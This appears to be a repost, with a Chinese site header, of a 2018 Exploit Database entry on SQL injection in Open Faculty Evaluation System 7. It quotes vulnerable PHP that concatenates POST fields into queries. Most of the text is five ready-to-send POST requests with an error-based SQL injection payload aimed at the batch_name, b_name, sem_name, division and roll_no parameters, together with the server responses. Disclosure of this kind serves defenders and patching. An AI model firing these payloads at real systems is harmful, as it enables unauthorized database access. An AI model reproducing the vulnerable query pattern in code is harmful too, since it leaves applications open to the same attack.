Open Faculty Evaluation System 7 – ‘batch_name’ SQL Injection

• Exploit Database
• 113 阅读

• 作者： Ihsan Sencan
  日期： 2018-10-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45707/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148

  # Exploit Title: Open Faculty Evaluation System 7 - 'batch_name' SQL Injection # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://openfacultyeval.sourceforge.io/ # Software Link: https://sourceforge.net/projects/openfacultyeval/files/feedback_php7.zip/download # Version: Php 7 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A   /[PATH]/submit_feedback.php #.... #15 include("includes/config_db.php"); #16 #17 if(isset($_POST['submit'])) #18 { #19 //feedback no #20 $check_feedback_no="select * from batch_master where batch_id='".$_POST['batch_name']."'"; #21 $res_feedback_no=mysqli_query($conn, $check_feedback_no) or die(mysqli_error($conn)); #22 $result=mysqli_fetch_array($res_feedback_no); #23 #24 #25 $sql="select * from feedback_master where roll_no='".$_POST['roll_no']."' and b_id='".$_POST['b_name']."' and f_id='".$_POST['fac_name']."' and sub_id='".$_POST['sub_name']."' and sem_id='".$_POST['sem_name']."' and batch_id='".$_POST['batch_name']."' and division_id='".$_POST['division']."' and feedback_no='".$result['feedback_no']."'"; #26 //echo $sql; #27 $res=mysqli_query($conn, $sql) or die(mysqli_error($conn)); #28 #29 //echo mysqli_num_rows($res); #30 //exit; #31 if(mysqli_num_rows($res)>=1) #32 { #....   # POC: # 1) # http://localhost/[PATH]/submit_feedback.php # POST /[PATH]/submit_feedback.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 282 batch_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit HTTP/1.1 200 OK Date: Mon, 29 Oct 2018 00:42:01 GMT Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22 X-Powered-By: PHP/7.1.22 Content-Length: 311 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8   # POC: # 2) # http://localhost/[PATH]/submit_feedback.php # POST /[PATH]/submit_feedback.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 278 b_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit HTTP/1.1 200 OK Date: Mon, 29 Oct 2018 00:58:04 GMT Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22 X-Powered-By: PHP/7.1.22 Content-Length: 1315 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8   # POC: # 3) # http://localhost/[PATH]/submit_feedback.php # POST /[PATH]/submit_feedback.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 280 sem_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit HTTP/1.1 200 OK Date: Mon, 29 Oct 2018 00:58:15 GMT Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22 X-Powered-By: PHP/7.1.22 Content-Length: 1313 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8   # POC: # 4) # http://localhost/[PATH]/submit_feedback.php # POST /[PATH]/submit_feedback.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 280 division=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit HTTP/1.1 200 OK Date: Mon, 29 Oct 2018 00:58:26 GMT Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22 X-Powered-By: PHP/7.1.22 Content-Length: 1313 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8   # POC: # 5) # http://localhost/[PATH]/submit_feedback.php # POST /[PATH]/submit_feedback.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 279 roll_no=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit HTTP/1.1 200 OK Date: Mon, 29 Oct 2018 00:58:33 GMT Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22 X-Powered-By: PHP/7.1.22 Content-Length: 1314 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8